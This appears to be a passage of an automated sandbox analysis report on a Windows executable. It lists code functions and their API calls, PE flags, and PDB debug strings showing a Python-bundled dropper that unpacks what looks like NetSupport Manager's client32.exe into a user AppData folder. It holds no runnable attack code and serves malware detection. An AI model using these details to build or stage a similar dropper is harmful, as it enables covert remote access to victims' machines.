                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0DEB40 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,_time64,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_new_ex_data,CRYPTO_THREAD_lock_free,ERR_new,ERR_set_debug,CRYPTO_free_ex_data,OPENSSL_cleanse,OPENSSL_cleanse,X509_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_clear_free,memcpy,1_2_00007FFDFB0DEB40
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1811 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,1_2_00007FFDFB0B1811
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0C6990 CRYPTO_THREAD_run_once,OPENSSL_sk_find,OPENSSL_sk_value,EVP_CIPHER_fetch,EVP_CIPHER_get_flags,1_2_00007FFDFB0C6990
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0C4980 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,BIO_snprintf,1_2_00007FFDFB0C4980
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1A32 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,1_2_00007FFDFB0B1A32
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B2577 ERR_new,ERR_set_debug,CRYPTO_free,BIO_clear_flags,BIO_set_flags,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,OPENSSL_cleanse,1_2_00007FFDFB0B2577
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1A41 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,memcmp,ERR_new,ERR_set_debug,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFB0B1A41
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B13DE EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get_security_bits,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_free,EVP_PKEY_get_bn_param,EVP_PKEY_get_bn_param,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BN_num_bits,BN_num_bits,memset,BN_num_bits,BN_bn2bin,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestSignInit_ex,ERR_new,ERR_set_debug,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,ERR_set_debug,EVP_DigestSign,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,BN_free,BN_free,BN_free,BN_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFB0B13DE
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1181 CRYPTO_free,CRYPTO_free,CRYPTO_free,1_2_00007FFDFB0B1181
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1A05 ERR_new,ERR_set_debug,ERR_set_error,ASN1_item_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,_time64,X509_free,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ASN1_item_free,1_2_00007FFDFB0B1A05
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B2365 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,memcpy,CRYPTO_free,CRYPTO_free,1_2_00007FFDFB0B2365
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B17F8 EVP_MD_CTX_new,EVP_PKEY_new_raw_private_key_ex,EVP_DigestSignInit_ex,EVP_DigestSign,EVP_MD_CTX_free,EVP_PKEY_free,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,_time64,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free,EVP_PKEY_free,ERR_new,ERR_set_debug,EVP_MD_CTX_free,EVP_PKEY_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFB0B17F8
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB11A930 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,1_2_00007FFDFB11A930
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0CE948 CRYPTO_free,1_2_00007FFDFB0CE948
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B2374 CRYPTO_free,1_2_00007FFDFB0B2374
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB112F60 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,EVP_PKEY_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,1_2_00007FFDFB112F60
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B4FA0 CRYPTO_free,1_2_00007FFDFB0B4FA0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1393 OSSL_PROVIDER_do_all,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,memcpy,1_2_00007FFDFB0B1393
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1B90 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,1_2_00007FFDFB0B1B90
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB106E70 CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,1_2_00007FFDFB106E70
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1677 CRYPTO_THREAD_write_lock,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,1_2_00007FFDFB0B1677
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1A23 BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,CRYPTO_strdup,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,1_2_00007FFDFB0B1A23
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0E8D90 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFB0E8D90
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0BCDC0 CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,CRYPTO_free,memset,CRYPTO_free,1_2_00007FFDFB0BCDC0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B195B CRYPTO_zalloc,EVP_MAC_free,EVP_MAC_CTX_free,CRYPTO_free,1_2_00007FFDFB0B195B
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B105F ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_clear_free,1_2_00007FFDFB0B105F
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB100E50 CRYPTO_memcmp,1_2_00007FFDFB100E50
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1E65 ERR_new,ERR_set_debug,CRYPTO_clear_free,1_2_00007FFDFB0B1E65
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B11A9 EVP_MAC_CTX_free,CRYPTO_free,1_2_00007FFDFB0B11A9
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB11ACD0 CRYPTO_free,CRYPTO_free,CRYPTO_free,1_2_00007FFDFB11ACD0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B2112 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,1_2_00007FFDFB0B2112
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0D8D10 CRYPTO_free,EVP_PKEY_free,CRYPTO_free,1_2_00007FFDFB0D8D10
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B21E4 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,1_2_00007FFDFB0B21E4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0DCD30 CRYPTO_THREAD_write_lock,OPENSSL_sk_new_null,OPENSSL_LH_delete,OPENSSL_sk_push,OPENSSL_LH_set_down_load,CRYPTO_THREAD_unlock,OPENSSL_sk_pop_free,1_2_00007FFDFB0DCD30
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB110D30 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,1_2_00007FFDFB110D30
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0D0380 X509_VERIFY_PARAM_free,CRYPTO_free_ex_data,BIO_pop,BIO_free,BIO_free_all,BIO_free_all,BUF_MEM_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,SCT_LIST_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_MD_CTX_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,ASYNC_WAIT_CTX_free,CRYPTO_free,OPENSSL_sk_free,CRYPTO_THREAD_lock_free,CRYPTO_free,1_2_00007FFDFB0D0380
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B25EF CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,memcpy,memcmp,memcmp,memcmp,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_clear_free,1_2_00007FFDFB0B25EF
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0C43A0 OPENSSL_sk_num,X509_STORE_CTX_new_ex,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_value,X509_STORE_CTX_init,ERR_new,ERR_set_debug,ERR_set_error,X509_STORE_CTX_free,X509_STORE_CTX_set_flags,CRYPTO_THREAD_run_once,X509_STORE_CTX_set_ex_data,OPENSSL_sk_num,X509_STORE_CTX_set0_dane,X509_STORE_CTX_set_default,X509_VERIFY_PARAM_set1,X509_STORE_CTX_set_verify_cb,X509_verify_cert,X509_STORE_CTX_get_error,OPENSSL_sk_pop_free,X509_STORE_CTX_get0_chain,X509_STORE_CTX_get1_chain,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_move_peername,X509_STORE_CTX_free,1_2_00007FFDFB0C43A0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B139D memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,1_2_00007FFDFB0B139D
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1B54 memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,memcmp,EVP_CIPHER_CTX_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcmp,memcpy,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,1_2_00007FFDFB0B1B54
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1401 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,1_2_00007FFDFB0B1401
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0FE260 CRYPTO_free,1_2_00007FFDFB0FE260
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Code function: 6_2_6CCE46D0 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,6_2_6CCE46D0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe File opened: C:\Users\user\AppData\Roaming\extracted\MSVCR100.dll
                                Source: BUenB12U2a.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1718897846.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715627674.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: m\1200\1200\ctl32\release\pcicapi.pdb source: BUenB12U2a.exe, 00000001.00000003.1792471952.0000020E47934000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1792471952.0000020E478F5000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: ucrtbase.pdb source: BUenB12U2a.exe, 00000001.00000002.2046118971.00007FFDFB858000.00000002.00000001.01000000.00000004.sdmp
                                Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715143617.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1717697238.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1718412389.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716414194.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1718514366.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715926087.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-kernel32-legacy-l1-1-1.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716116780.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1718313895.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: BUenB12U2a.exe, 00000001.00000002.2048240010.00007FFE13320000.00000002.00000001.01000000.00000008.sdmp
                                Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1718412389.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716720343.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1719242514.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1714954517.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1717906121.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716627073.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: BUenB12U2a.exe, 00000000.00000003.1714467439.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2047237276.00007FFE11EBC000.00000002.00000001.01000000.0000000B.sdmp
                                Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1717153712.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-fibers-l1-1-1.pdb source: BUenB12U2a.exe, 00000000.00000003.1715439018.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-fibers-l1-1-1.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715439018.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715542957.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1718313895.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1719242514.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-file-l2-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715737864.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-fibers-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715345292.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1715833362.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: pcicapi.pdbm\1200\1200\ctl32\release\pcicapi.pdb source: BUenB12U2a.exe, 00000001.00000003.1792471952.0000020E47934000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\ctl32\Full\pcichek.pdb source: BUenB12U2a.exe, 00000001.00000003.1795696339.0000020E478BE000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1793258912.0000020E478C0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3578656714.0000000072A02000.00000002.00000001.01000000.00000018.sdmp, client32.exe, 00000009.00000002.1882967027.0000000072A02000.00000002.00000001.01000000.00000018.sdmp
                                Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1717697238.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1717594095.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: ucrtbase.pdbOGPS source: BUenB12U2a.exe, 00000001.00000002.2046118971.00007FFDFB858000.00000002.00000001.01000000.00000004.sdmp
                                Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716627073.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\ctl32\release\tcctl32.pdb source: BUenB12U2a.exe, 00000001.00000003.1795250891.0000020E4793B000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1795386408.0000020E480F8000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1795157174.0000020E480F8000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: BUenB12U2a.exe, 00000000.00000003.1713211636.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2048699766.00007FFE1A473000.00000002.00000001.01000000.00000006.sdmp
                                Source: Binary string: pcicapi.pdbm\1200\1200\ctl32\re source: BUenB12U2a.exe, 00000001.00000003.1792443499.0000020E4793B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716319151.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-string-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1717379256.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1719097973.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: BUenB12U2a.exe, 00000000.00000003.1716837900.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1715143617.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716221103.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716319151.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716520545.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: BUenB12U2a.exe, 00000000.00000003.1734718819.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2047920798.00007FFE13303000.00000002.00000001.01000000.0000000D.sdmp
                                Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1717268731.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1714954517.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1718799711.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1719353500.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716019575.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1717482852.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1717268731.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\libssl-3.pdb source: BUenB12U2a.exe, 00000001.00000002.2043270847.00007FFDFB134000.00000002.00000001.01000000.0000000F.sdmp
                                Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1718514366.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1719097973.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: BUenB12U2a.exe, 00000001.00000002.2046552473.00007FFE1024D000.00000002.00000001.01000000.0000000E.sdmp
                                Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1718614963.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1716414194.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: BUenB12U2a.exe, 00000000.00000003.1719004065.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\client32\Release\client32.pdb source: BUenB12U2a.exe, 00000001.00000003.1790436043.0000020E478F5000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000000.1797525197.0000000000A62000.00000002.00000001.01000000.00000016.sdmp, client32.exe, 00000006.00000002.3573445263.0000000000A62000.00000002.00000001.01000000.00000016.sdmp, client32.exe, 00000009.00000002.1881091510.0000000000A62000.00000002.00000001.01000000.00000016.sdmp, client32.exe, 00000009.00000000.1879479005.0000000000A62000.00000002.00000001.01000000.00000016.sdmp
                                Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: BUenB12U2a.exe, 00000001.00000002.2042596622.00007FFDFAF59000.00000002.00000001.01000000.00000010.sdmp
                                Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1713211636.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2048699766.00007FFE1A473000.00000002.00000001.01000000.00000006.sdmp
